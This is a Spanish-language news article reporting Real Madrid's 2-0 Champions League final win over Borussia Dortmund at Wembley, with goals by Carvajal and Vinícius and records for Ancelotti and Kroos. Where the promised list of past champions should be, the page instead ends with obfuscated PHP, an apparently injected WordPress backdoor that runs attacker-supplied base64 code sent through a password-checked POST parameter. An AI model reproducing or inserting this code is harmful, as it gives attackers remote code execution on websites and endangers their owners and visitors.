Real Madrid ratificó que es demoledor y sumó su decimoquinta vuelta olímpica en la Champions

Real Madrid le ganó a Borussia Dortmund 2-0, en el estadio de Wembley, y se coronó campeón de la Champions League, por decimoquinta oportunidad. El equipo español fue superado en el juego en el primer tiempo, pero mejoró en el segundo, hizo valer su mística y su tradición y celebró con los goles de Dani Carvajal y Vinícius.

No te quedó sueño por vengar”, como dice la legendaria canción de Patricio Rey y sus Redonditos de Ricota, Salando las heridas, encasilla justo en este Real Madrid, que no le queda título por ganar. El Merengue acumula vueltas olímpicas al por mayor, 104 veces se coronó campeón el reciente campeón de La Liga de España.

Borussia Dortmund apabulló a Real Madrid en el primer tiempo. Lo dominó, le creo varias situaciones claras de gol y no le permitió disponer ni siquiera de una chance favorable. A pesar de eso, en el ambiente flotaba esa sensación que el equipo español, a pesar de todo, iba a sacar en algún momento la cabeza a flote.

En ese período inicial, un tiro de Niclas Füllkrug pegó en el poste y el reaparecido Thibaut Courtois, recuperado de la lesión, le tapó dos remates peligrosísimos a Adeyemi y a Marcel Sabitzer.

Levantó el equipo de Carlo Ancelotti en el segundo tiempo. Emparejó el juego, mostró firmeza con Toni Kroos -en su último partido en el club, jugará la Eurocopa para Alemania y luego se retirará- y desequilibrio con Vinicius, a la par de una mejoría general.

Kroos ejecutó un tiro de esquina y Carvajal, saltando, girando el cuello y dandole dirección y potencia al cabezazo, determinó la apertura del resultado, a los 28 minutos.

Ese gol desmoronó a Borussia Dortumund, fue un cachetazo difícil de asimilar para el conjunto alemán. No liquidó a Real Madrid cuando pudo, y sufrió cuando su rival mostró sus credenciales.

Un mal pase de Ian Maatsen le permitió a Jude Bellingham asistir a Vinícius, quien apareciendo libre por la izquierda metió el zurdazo cruzado rumbo al 2 a 0, a los 37 minutos.

Así Real Madrid alcanzó su coronación número 15 en la Champions League, ratificando que es el club más ganador del certamen. Para Carlo Ancelotti fue la quinta conquista como técnico: ganó dos con Milan (2003 y 2007) y tres con Real Madrid (2014, 2022 y 2024); además como futbolista la había ganado con Milan (1989 y 1990).

Dani Carvajal, Nacho Fernández, Toni Kroos -titulares hoy los tres- y Luka Modric, quien ingresó al final, lograron su sexta Champions League. En el caso de Kroos, una fue con Bayern Munich y las otras cinco con Real Madrid.

El historial de clubes campeones de la Champions League es:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}